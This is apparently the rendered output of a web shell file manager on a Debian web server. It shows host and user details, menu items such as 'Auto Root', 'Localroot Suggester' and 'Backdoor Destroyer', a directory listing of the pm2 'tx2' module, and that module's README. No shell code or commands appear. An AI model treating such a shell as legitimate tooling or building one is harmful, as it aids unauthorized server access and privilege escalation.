Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
node_modules /
pm2 /
node_modules /
tx2 /
Delete
Unzip
Name
Size
Permission
Date
Action
example
[ DIR ]
drwxr-xr-x
2025-04-08 13:05
src
[ DIR ]
drwxr-xr-x
2025-04-08 13:05
test
[ DIR ]
drwxr-xr-x
2025-04-08 13:05
.travis.yml
125
B
-rw-r--r--
2025-04-08 13:05
API.md
3.37
KB
-rw-r--r--
2025-04-08 13:05
LICENSE
1.04
KB
-rw-r--r--
2025-04-08 13:05
README.md
578
B
-rw-r--r--
2025-04-08 13:05
index.js
59
B
-rw-r--r--
2025-04-08 13:05
package.json
433
B
-rw-r--r--
2025-04-08 13:05
Save
Rename
## tx2 Report Events, Metrics, Issues, Actions to PM2 and PM2.io. ```javascript const tx2 = require('tx2') let body = { calories : 20 } tx2.metric('burnt calories', () => body.calories) tx2.action('lift weights', (cb) => { cb({ success: true }) }) ``` Check [API.md](API.md) for full API doc. Once you have created some metrics: ```bash $ pm2 start app.js ``` Then run: ```bash # Inspect primitive reported $ pm2 show app ``` or go to pm2.io for web based interface + insights creation. ## More Generate documentation: ```bash $ npm run doc ``` ## License MIT